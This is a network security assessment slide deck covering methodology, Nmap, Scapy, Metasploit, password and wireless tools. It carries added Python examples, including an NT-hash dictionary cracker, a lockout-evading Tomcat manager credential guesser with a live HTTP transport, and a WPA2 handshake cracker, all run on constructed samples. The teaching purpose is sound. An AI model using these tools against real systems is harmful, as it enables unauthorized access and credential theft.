Key Tools for a Network Security

Assessment

John Tannahill, CA, CISM, CGEIT, CRISC

[email protected]

Areas of Coverage

• Network Security Assessment Areas

• Methodology & Tools

• Reconnaissance

• TCP/IP Service Enumeration

• Network Vulnerability / Network Penetration Assessments

Network Security Assessments

• Internet Perimeter

• Virtual Private Networks

– Business Partner

– Employee Remote Access

• Network Device Configurations

– Firewall; Switch (VLAN)

• Sensitive Network Subnets / Segments

• Wireless LAN Infrastructure

• Remote Access


Network Security Controls

• Defense in Depth

• Firewalls - Security Zones

• Network Segmentation / Isolation

• Traffic Flow (Ingress / Egress)

• Hardened OS

• Hardened TCP/IP Services

• IDS/IPS/SIEM Architecture

• Network Management


Next Generation Firewalls

• Functions Used / Implemented (e.g. Palo Alto)

– Policy based - User-ID / context

– WildFire (anti-malware; anti-spyware) - cloud service

– Vulnerability Protection

– URL Filtering

– Data Filtering (e.g. SSN)

– Zone Protection (Trusted / Untrusted)

– SSL Decryption (inbound / outbound)

• NGFW Security Configuration Standards


Network Security Assessments

• Vulnerability Assessment Areas

– Network

– Browser

– Web / Mobile Application

– Mobile Device

– Social Engineering

– Physical Ingress (Raspberry Pi)

• Host-Based Assessment (e.g. Windows OS)

• TCP/IP Service Assessment (e.g. Database)

• Penetration Testing

• Red Team / Blue Team


Common Network Vulnerabilities

• Network services with known vulnerabilities and not patched

• Network services / applications that are not properly configured or secured

• Network services with poor authentication

• Network transmission of clear text passwords and traffic


Network Vulnerability Assessment Approach

• Reconnaissance

– ping sweep

– DNS

– Maltego

– Shodan

– Google Hacks

• TCP/IP Service Enumeration

• Vulnerability Identification

– Network probes for known vulnerabilities

– Exploit identification based on TCP/IP services found

• Exploit Testing

– exploit code


Testing Methodologies

• NIST Special Publication 800-115

– Technical Guide to Information Security Testing and Assessment

• Penetration Testing Execution Standard (PTES)

• PCI Guidelines

SP800-115 Overview

• Security Testing and Examination Overview

– Information Security Assessment Methodology

– Technical Assessment Techniques

• Target Identification and Analysis Techniques

• Target Vulnerability Validation Techniques

• Security Assessment Planning

• Security Assessment Execution

• Post-Testing Activities


800-115 – Pen Test Areas


Penetration Testing Execution Standard


Penetration Test Guidance


Red Team Exercises

• Red Team

• Blue Team


Kali Distributions

• Pre-built Linux OS with Security and Audit Toolkit

• www.kali.org

• Kali Walkthrough

• Raspberry Pi


Wireshark / Ettercap

Maltego


Shodan


Google Hacking Database


Exploit-db.com


Nmap (nmap.org)

• Ping Sweep

• Port Scans

– TCP; UDP

• Zenmap – network topology

• Ncat

• Nping

• Ndiff

• Vulnerability scanning (NSE)
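Ndiff exists so that two Nmap runs of the same range can be compared and only the change in exposure has to be read, not the whole scan again. The following is an added example, not Nmap's own code and not from the deck: it performs the same comparison on Nmap XML output (`-oX`) using only the Python standard library. Both XML documents are constructed sample scans with made-up addresses; the element and attribute names are the ones Nmap writes.

```python
import xml.etree.ElementTree as ET

# Two constructed Nmap XML documents (shape of `nmap -oX`), standing in for a
# baseline scan and a later re-scan of the same range. Not real scan results.
BASELINE_XML = """<nmaprun scanner="nmap" args="nmap -oX baseline.xml 192.168.1.0/24">
  <host><status state="up"/><address addr="192.168.1.121" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
</nmaprun>"""

CURRENT_XML = """<nmaprun scanner="nmap" args="nmap -oX current.xml 192.168.1.0/24">
  <host><status state="up"/><address addr="192.168.1.121" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="5900"><state state="open"/><service name="vnc"/></port>
    </ports>
  </host>
  <host><status state="up"/><address addr="192.168.1.122" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/></port>
    </ports>
  </host>
</nmaprun>"""


def open_ports(xml_text: str) -> dict:
    """Return {ip: {(proto, port): service}} for every open port of every host that is up."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue
        ports = {}
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not part of the exposure picture
            service = port.find("service")
            name = service.get("name", "unknown") if service is not None else "unknown"
            ports[(port.get("protocol"), int(port.get("portid")))] = name
        hosts[addr.get("addr")] = ports
    return hosts


def diff_scans(baseline_xml: str, current_xml: str) -> list:
    """Ndiff-style change list: (kind, ip, (proto, port) or None, service or None)."""
    before, after = open_ports(baseline_xml), open_ports(current_xml)
    changes = []
    for ip in sorted(set(before) | set(after)):
        if ip not in before:
            changes.append(("new_host", ip, None, None))
        if ip not in after:
            changes.append(("host_gone", ip, None, None))
        b, a = before.get(ip, {}), after.get(ip, {})
        for key in sorted(set(a) - set(b)):
            changes.append(("opened", ip, key, a[key]))
        for key in sorted(set(b) - set(a)):
            changes.append(("closed", ip, key, b[key]))
    return changes


def format_changes(changes: list) -> list:
    """One line per change: '+' for new exposure, '-' for something that went away."""
    lines = []
    for kind, ip, key, service in changes:
        if key is None:
            lines.append(("+ " if kind == "new_host" else "- ") + ip + " (" + kind + ")")
        else:
            sign = "+ " if kind == "opened" else "- "
            lines.append(f"{sign}{ip} {key[0]}/{key[1]} {service}")
    return lines


if __name__ == "__main__":
    print("\n".join(format_changes(diff_scans(BASELINE_XML, CURRENT_XML))))
```

Only open ports on hosts that are up are compared, so a host that merely stopped answering probes shows up as `host_gone` rather than as a list of closed ports; run the same scan options for both sides, or the diff reports your own option changes as findings.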


Nmap Scan

> nmap 192.168.1.121

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
443/tcp  open  https
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s
3389/tcp open  ms-term-serv
5900/tcp open  vnc
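What the assessor does with a scan like this one is map each open service onto the vulnerability classes listed under "Common Network Vulnerabilities" (cleartext transmission, poor authentication, unpatched or misconfigured services) and decide what to check first. The following is an added example, my own code rather than the deck's: it parses Nmap's normal output for the host above and applies a small triage table. The table and its follow-up checks are a starting point I wrote for this example, not a standard; any service it does not know is routed to manual review rather than silently dropped.

```python
import re

# Output printed on the 'Nmap Scan' slide (nmap 192.168.1.121), reproduced as the input.
SCAN_OUTPUT = """\
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
443/tcp  open  https
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s
3389/tcp open  ms-term-serv
5900/tcp open  vnc
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

# My own triage table: service name -> (category, why it matters, first check to make).
# Categories follow the deck's list: cleartext transmission, poor authentication,
# unpatched/misconfigured services; 'verify' = encrypted but configuration-dependent.
TRIAGE = {
    "ftp":          ("cleartext",    "logins and file contents unencrypted",      "anonymous login; replace with SFTP/FTPS"),
    "telnet":       ("cleartext",    "interactive logins unencrypted",            "disable; use SSH"),
    "smtp":         ("cleartext",    "mail and AUTH unencrypted unless STARTTLS", "STARTTLS offered? open relay?"),
    "http":         ("cleartext",    "forms, cookies and sessions unencrypted",   "is a login served here instead of on 443?"),
    "ldap":         ("cleartext",    "simple binds send passwords in the clear",  "anonymous bind; LDAPS or StartTLS enforced?"),
    "vnc":          ("poor-auth",    "classic VNC auth is an 8-char DES challenge, often unset", "password required? restrict or tunnel"),
    "msrpc":        ("patch-config", "Windows RPC endpoint mapper exposed",       "patch level; block from untrusted networks"),
    "netbios-ssn":  ("patch-config", "NetBIOS session service exposed",           "null sessions; user and share enumeration"),
    "microsoft-ds": ("patch-config", "SMB exposed",                               "SMB signing, SMBv1, null sessions, patch level"),
    "ms-sql-s":     ("patch-config", "SQL Server reachable from this network",    "sa password, mixed-mode auth, patch level"),
    "ms-term-serv": ("patch-config", "RDP exposed",                               "NLA required? lockout policy? source restriction?"),
    "ssh":          ("verify",       "encrypted, but version and config matter",  "version, password auth, weak algorithms"),
    "https":        ("verify",       "encrypted, but TLS config matters",         "protocol versions, ciphers, certificate"),
}
UNKNOWN = ("review", "no triage rule for this service", "identify it (nmap -sV, banner grab) and decide")
CATEGORY_ORDER = ["cleartext", "poor-auth", "patch-config", "review", "verify"]


def parse_nmap_output(text: str) -> list:
    """Return (port, proto, state, service) for each port line of Nmap's normal output."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return ports


def triage(ports: list) -> list:
    """Attach a category and follow-up check to every open port; unknown services go to review."""
    findings = []
    for port, proto, state, service in ports:
        if state != "open":
            continue
        category, note, check = TRIAGE.get(service, UNKNOWN)
        findings.append({"port": port, "proto": proto, "service": service,
                         "category": category, "note": note, "check": check})
    return findings


def summarize(findings: list) -> dict:
    """Ports grouped by category, in the order an assessor would work through them."""
    return {cat: sorted(f["port"] for f in findings if f["category"] == cat) for cat in CATEGORY_ORDER}


def report(findings: list) -> list:
    ordered = sorted(findings, key=lambda f: (CATEGORY_ORDER.index(f["category"]), f["port"]))
    return [f"[{f['category']}] {f['port']}/{f['proto']} {f['service']}: {f['note']} -> {f['check']}"
            for f in ordered]


if __name__ == "__main__":
    print("\n".join(report(triage(parse_nmap_output(SCAN_OUTPUT)))))
```

The service column here is Nmap's port-table guess, not a fingerprint; before reporting any of these as findings, confirm them with `-sV` and the service-specific checks the deck lists later (database, web, password tools).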


Scapy

• Python library: Scapy

• Packet manipulation tool

• Example Uses

– Scanning

– Probing

– Attacks

– Network discovery

– Test Snort rules
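Scapy's value for scanning and probing is that `IP(dst=...)/TCP(dport=..., flags="S")` assembles a correct packet and fills in the checksums without the user touching a byte. To show what those layers actually contain, here is an added example (not Scapy code and not from the deck) that builds a TCP SYN probe with only the Python standard library, verifies both checksums by decoding it again, and classifies a reply the way a SYN scan (`nmap -sS`) does. The addresses and ports are made up; `send_probe` needs raw-socket privilege (root or CAP_NET_RAW on Linux) and is not called by the offline demo.

```python
import socket
import struct

SYN, RST, ACK = 0x02, 0x04, 0x10   # TCP flag bits used below


def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones-complement sum used by the IPv4 and TCP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src: str, dst: str, payload_len: int, ttl: int = 64) -> bytes:
    """20-byte IPv4 header, IHL 5, DF set, protocol TCP, checksum filled in."""
    header = struct.pack("!BBHHHBBH4s4s",
                         (4 << 4) | 5, 0, 20 + payload_len, 0x1234, 0x4000,
                         ttl, socket.IPPROTO_TCP, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
    return header[:10] + struct.pack("!H", inet_checksum(header)) + header[12:]


def tcp_pseudo_header(src: str, dst: str, tcp_len: int) -> bytes:
    """The pseudo-header TCP prepends when checksumming: src, dst, zero, proto, TCP length."""
    return struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst),
                       0, socket.IPPROTO_TCP, tcp_len)


def tcp_syn_header(src: str, dst: str, sport: int, dport: int, seq: int = 0x1000, window: int = 64240) -> bytes:
    """20-byte TCP header with only SYN set (data offset 5 words), checksum over pseudo-header + header."""
    header = struct.pack("!HHIIHHHH", sport, dport, seq, 0, (5 << 12) | SYN, window, 0, 0)
    csum = inet_checksum(tcp_pseudo_header(src, dst, len(header)) + header)
    return header[:16] + struct.pack("!H", csum) + header[18:]


def build_syn_probe(src: str, dst: str, sport: int, dport: int) -> bytes:
    tcp = tcp_syn_header(src, dst, sport, dport)
    return ipv4_header(src, dst, len(tcp)) + tcp


def decode_probe(packet: bytes) -> dict:
    """Parse a packet back and report whether both checksums verify (sum over data incl. checksum == 0)."""
    ver_ihl, _tos, total_len, _id, _frag, ttl, proto, _ipcs, src, dst = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (ver_ihl & 0x0F) * 4
    tcp = packet[ihl:]
    sport, dport, _seq, _ack, off_flags, _win, _tcs, _urg = struct.unpack("!HHIIHHHH", tcp[:20])
    src_s, dst_s = socket.inet_ntoa(src), socket.inet_ntoa(dst)
    return {
        "src": src_s, "dst": dst_s, "ttl": ttl, "proto": proto, "total_len": total_len,
        "sport": sport, "dport": dport, "flags": off_flags & 0x01FF,
        "ip_checksum_ok": inet_checksum(packet[:ihl]) == 0,
        "tcp_checksum_ok": inet_checksum(tcp_pseudo_header(src_s, dst_s, len(tcp)) + tcp) == 0,
    }


def classify_syn_reply(flags: int) -> str:
    """SYN-scan logic: SYN/ACK means open, RST means closed, silence means filtered."""
    if flags & SYN and flags & ACK:
        return "open"
    if flags & RST:
        return "closed"
    return "filtered"


def send_probe(packet: bytes, dst: str) -> None:
    """Emit the hand-built packet (Linux, privileged). Not exercised by the offline demo."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)  # we supply the IP header
        s.sendto(packet, (dst, 0))


if __name__ == "__main__":
    probe = build_syn_probe("192.168.1.10", "192.168.1.121", 40000, 445)
    print(probe.hex())
    print(decode_probe(probe))
    print(classify_syn_reply(SYN | ACK), classify_syn_reply(RST | ACK), classify_syn_reply(0))
```

One practical point this makes visible: the kernel never saw a connection for this probe, so when the target's SYN/ACK arrives the kernel answers it with a RST of its own. Scapy users normally add an iptables rule dropping outbound RSTs for the scanning port for that reason.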


Network Vulnerability Assessment

• Generic assessment tools

– OpenVAS; Nexpose

• TCP/IP service-specific (e.g. http / database)

• Metasploit Framework

– Framework for testing and using exploit code


Kali – Web Testing Tools

• Local Proxies – OWASP ZAP Proxy

• Nikto

• Dirbuster

• SQL Injection Tools (sqlmap)


Password Cracking Tools

• John the Ripper

• Hydra

• Ophcrack

• Mimikatz (credential extraction from Windows memory rather than cracking)

• Pass-the-Hash (a technique rather than a tool: an NT hash authenticates over NTLM as-is, so cracking it is unnecessary)
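Windows NT hashes are unsalted MD4 over the UTF-16LE password. That is why John the Ripper and Ophcrack can test one candidate against every dumped account at once, and why a dumped hash is usable directly for pass-the-hash. The following is an added example, not from the deck or from any of the tools listed: a pure-Python MD4 (hashlib's md4 is disabled in many OpenSSL 3 builds), the NT hash, and a dictionary attack over a constructed pwdump-style sample. The first sample hash is the well-known hash of `password`; the other two are generated in place so the sample stays consistent.

```python
import struct


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(message: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python."""
    msg = bytearray(message)
    bit_len = len(msg) * 8
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):                                   # round 1
            a = _rotl((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = ((A + a) & 0xFFFFFFFF, (B + b) & 0xFFFFFFFF,
                      (C + c) & 0xFFFFFFFF, (D + d) & 0xFFFFFFFF)
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); no salt, so one computation checks every account."""
    return md4(password.encode("utf-16le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash stored when LM hashing is disabled

# Constructed pwdump-style lines (user:RID:LM:NT:::), not from any real system.
SAMPLE_DUMP = "\n".join([
    "Administrator:500:" + EMPTY_LM + ":8846f7eaee8fb117ad06bdd830b7586c:::",
    "svc_backup:1105:" + EMPTY_LM + ":" + nt_hash("Summer2014") + ":::",
    "jdoe:1001:" + EMPTY_LM + ":" + nt_hash("correct horse battery staple") + ":::",
])


def parse_pwdump(dump: str) -> list:
    """(user, lm_hash, nt_hash) per line; malformed lines are skipped."""
    accounts = []
    for line in dump.splitlines():
        parts = line.split(":")
        if len(parts) >= 4:
            accounts.append((parts[0], parts[2].lower(), parts[3].lower()))
    return accounts


def crack_nt_hashes(dump: str, wordlist) -> dict:
    """Dictionary attack as the crackers run it: hash each candidate once, look up all accounts."""
    lookup = {nt_hash(word): word for word in wordlist}
    return {user: lookup[nt] for user, _lm, nt in parse_pwdump(dump) if nt in lookup}


def lm_enabled(dump: str) -> list:
    """Accounts whose LM hash is not the empty value, i.e. the weak LM hash is still being stored."""
    return [user for user, lm, _nt in parse_pwdump(dump) if lm != EMPTY_LM]


if __name__ == "__main__":
    print(crack_nt_hashes(SAMPLE_DUMP, ["123456", "Summer2014", "password", "letmein"]))
    print("LM still stored for:", lm_enabled(SAMPLE_DUMP))
```

The `jdoe` entry is not recovered by the short wordlist, which is the point: a dictionary attack only finds what is in the dictionary, whereas the NT hash itself (whatever its password) is enough for pass-the-hash against any host that accepts NTLM for that account.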


Metasploit Framework

• Metasploit

– Auxiliary Modules

– Exploits

– Payloads e.g. Meterpreter / Reverse Shell

– Related tools that integrate with Metasploit: BeEF, Karmetasploit, SET

• Armitage

• Tomcat Example:

– use auxiliary/scanner/http/tomcat_mgr_login

– use exploit/multi/http/tomcat_mgr_deploy
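The two modules named above are a login scanner followed by a deploy: the first finds working manager credentials, the second uses them to upload a WAR. The following is an added example, my own code and not Metasploit's, that performs the first step's logic: it walks a credential list against the manager URL, reads Tomcat's status codes, and caps failures per username so the scan does not trip Tomcat's default LockOutRealm (five failures locks the user for 300 seconds, which would turn a real hit into a false negative). The URL, the credential list and the `fake_tomcat` responder are constructed for the offline demo; `http_status` is the live transport (also usable for Hydra-style HTTP checks against other Basic-auth endpoints).

```python
import base64
import urllib.error
import urllib.request

# A short default-credential list of the kind tomcat_mgr_login iterates (my own, illustrative).
DEFAULT_CREDS = [
    ("tomcat", "tomcat"), ("admin", "admin"), ("tomcat", "s3cret"), ("admin", ""),
    ("manager", "manager"), ("role1", "tomcat"), ("admin", "tomcat"),
]


def basic_auth_header(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def http_status(url: str, user: str, password: str, timeout: float = 5.0) -> int:
    """Live transport: one GET with Basic auth; returns the HTTP status code."""
    req = urllib.request.Request(url, headers={"Authorization": basic_auth_header(user, password)})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.getcode()
    except urllib.error.HTTPError as err:
        return err.code


def check_manager_creds(url: str, creds=DEFAULT_CREDS, attempt=http_status, per_user_limit: int = 4) -> list:
    """Try each pair against the manager URL and interpret Tomcat's answer:
    200 = valid with manager-gui role, 403 = valid password but no role, 401 = rejected.
    Stops trying a username after per_user_limit failures (below the default lockout of 5)."""
    failures = {}
    results = []
    for user, password in creds:
        if failures.get(user, 0) >= per_user_limit:
            results.append((user, password, None, "skipped (lockout guard)"))
            continue
        code = attempt(url, user, password)
        if code == 200:
            verdict = "VALID - manager access"
        elif code == 403:
            verdict = "valid password, insufficient role"
        elif code == 401:
            verdict = "rejected"
            failures[user] = failures.get(user, 0) + 1
        else:
            verdict = f"unexpected HTTP {code}"
        results.append((user, password, code, verdict))
    return results


# Offline stand-in for a Tomcat manager: a constructed responder, not a real server.
SAMPLE_ACCOUNTS = {("tomcat", "s3cret"): 200, ("role1", "tomcat"): 403}


def fake_tomcat(url: str, user: str, password: str) -> int:
    return SAMPLE_ACCOUNTS.get((user, password), 401)


if __name__ == "__main__":
    for user, password, code, verdict in check_manager_creds("http://10.0.0.5:8080/manager/html",
                                                             attempt=fake_tomcat):
        print(f"{user}:{password!r} -> {code} {verdict}")
```

A 403 is worth reporting on its own: the password is valid for that account, it just lacks `manager-gui`, and the same credentials may carry `manager-script`, which is exactly what a text-interface deploy needs.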


Wireless Security Assessment

• Wireless Architecture

• Network Segmentation

• WPA / WPA2 Security

• Rogue Access Point Detection

• Tools:

– Kismet

– Aircrack-ng

– sslstrip

– WiFi Pineapple (Mark V)

– Raspberry Pi

• Bluetooth
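WPA2-PSK cracking with Aircrack-ng is a dictionary attack against a captured 4-way handshake: each candidate passphrase is run through PBKDF2 to get the PMK, the PMK through PRF-512 to get the PTK, and the first 16 bytes of the PTK (the KCK) are used to recompute the MIC of handshake message 2; a match means the candidate is the network key. The following is an added example, my own code and not Aircrack-ng's or the deck's, that carries out that chain against a constructed handshake whose MACs and nonces are made up and whose MIC was produced from the passphrase `password`. The PMK for passphrase `password` and SSID `IEEE` is the IEEE 802.11i test vector, so the first step can be checked independently.

```python
import hashlib
import hmac
import struct


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (the PSK) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || counter) blocks, concatenated."""
    out = b""
    for counter in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
    return out[:64]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


MIC_OFFSET = 81   # MIC field position in the EAPOL-Key frame: 4-byte 802.1X header + 77 bytes of fields


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, key_data: bytes = b"") -> bytes:
    """Constructed 4-way-handshake message 2 (client -> AP) with an all-zero MIC field."""
    body = (b"\x02"                            # descriptor type: RSN
            + struct.pack(">H", 0x010A)        # key info: version 2, pairwise, MIC present
            + struct.pack(">H", 16)            # key length
            + struct.pack(">Q", 1)             # replay counter
            + snonce                           # 32-byte SNonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID
            + bytes(16)                        # MIC placeholder
            + struct.pack(">H", len(key_data)) + key_data)
    return b"\x02\x03" + struct.pack(">H", len(body)) + body


def crack_wpa2(ssid, ap_mac, client_mac, anonce, snonce, frame, wordlist):
    """Aircrack-ng's inner loop: PBKDF2 -> PTK -> KCK -> MIC per candidate, compared to the captured MIC."""
    captured = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = wpa2_ptk(wpa2_pmk(candidate, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), captured):
            return candidate
    return None


# Constructed capture: MACs and nonces are made up; the MIC is computed from passphrase "password".
SSID = "IEEE"
AP_MAC, CLIENT_MAC = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))


def make_sample_capture(passphrase: str = "password") -> bytes:
    frame = build_eapol_msg2(SNONCE)
    kck = wpa2_ptk(wpa2_pmk(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


if __name__ == "__main__":
    print(wpa2_pmk("password", "IEEE").hex())
    print(crack_wpa2(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, make_sample_capture(),
                     ["letmein", "Summer2014", "password"]))
```

The 4096 PBKDF2 iterations per candidate are the whole cost of the attack and are tied to the SSID, which is why rainbow tables only exist for common SSIDs and why a long random passphrase on a unique SSID stays out of reach; the assessment question is whether the PSK in use is in a wordlist, not whether WPA2 itself is broken.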

Cloud Considerations

• Security as a Service

– Assessment Tools

• Vulnerability Assessment / Penetration Testing of Cloud Services

– AWS


Summary

• Scope of Assessments

• Scope Exclusions

• Structured Methodology and Approach

• Understand Tools

• ‘Get out of Jail’ / Escalation Processes

• Vulnerability versus Penetration Testing

• Security Metrics

• Remediation

• 0-day Vulnerabilities
